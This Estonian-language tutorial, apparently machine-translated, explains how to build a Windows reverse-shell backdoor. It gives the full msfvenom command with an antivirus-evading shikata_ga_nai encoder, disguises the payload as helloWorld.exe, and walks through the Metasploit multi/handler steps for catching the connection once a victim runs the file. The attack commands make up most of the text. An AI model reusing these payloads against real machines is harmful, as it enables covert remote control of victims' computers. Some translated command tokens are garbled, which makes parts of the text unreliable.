Turvamehhanismidest mööda hiilimiseks kasutatakse tagaust, sageli salaja ja enamasti märkamatult. Kasutades MSFvenomi, msfpayloadi ja msfencode’i kombinatsiooni, on võimalik luua tagauks, mis ühendub tagasi ründajaga, kasutades pöördkesta TCP-d. Tagaukse väljatöötamiseks peate viirusetõrjetarkvarast kõrvalehoidmiseks muutma oma pahavara signatuuri. Viige see projekt lõpule arvutipaaril, millele teil on juurdepääs, ja saate selle käigus rohkem teada arvutiturbe ja selle tagaukse toimimise kohta.
1
Käivitage Kali ja käivitage terminalikonsool.
2
Liidese kuvamiseks tippige ifconfig ja kontrollige oma IP-aadressi.
3
Kodeerijate loendi kuvamiseks tippige msfvenom -l kodeerijad. Kodeerijana kasutate x86/shikata_ga_nai.
4
Tippige “msfvenom -a x86 –platvorm windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b “x00” -e x86/shikata_ga_nai -f exe > helloWorld.exe-a x86 –platvorm windows määrab kasutatava arhitektuuri.-p windows/shell/reverse_tcp määrab manustatavad kasulikud koormused.LHOST määrab kuulaja IP-aadressi.LPORT tähistab kuulaja porti. -b “x00″ tähistab halbade märkide (nullbaitide) vältimist.-e x86 /shikata_ga_nai määrab kodeerija nime.-f exe > helloWorld.exe tähistab vormingu väljundit.
5
Metasploiti aktiveerimiseks tippige msfconsole. Nüüd olete loonud oma tagaukse. Kui ohver klõpsab helloWorld.exe-l, aktiveeritakse manustatud kestakoormus ja loob ühenduse tagasi teie süsteemiga. Ühenduse vastuvõtmiseks tuleb avada Metasploitis multihandler ja määrata kasulikud koormused.
6
Tüüp use exploit/multi/handler.
7
Tippige set payload windows/shell/reverse_tcp.
8
Mooduli kontrollimiseks tippige käsk show options.
9
Tüübikomplekt LHOST 192.168.48.129.”LHOST” määrab kuulaja IP-aadressi.
10
Tüübikomplekt LPORT 4444.”LPORT” tähistab kuulari porti.
11
Tippige käsk run ja oodake ühendust ohvri masinast.
12
Oodake, kuni ohver klõpsab failil helloWorld.exe. Seejärel ühendatakse teid edukalt ohvri masinaga.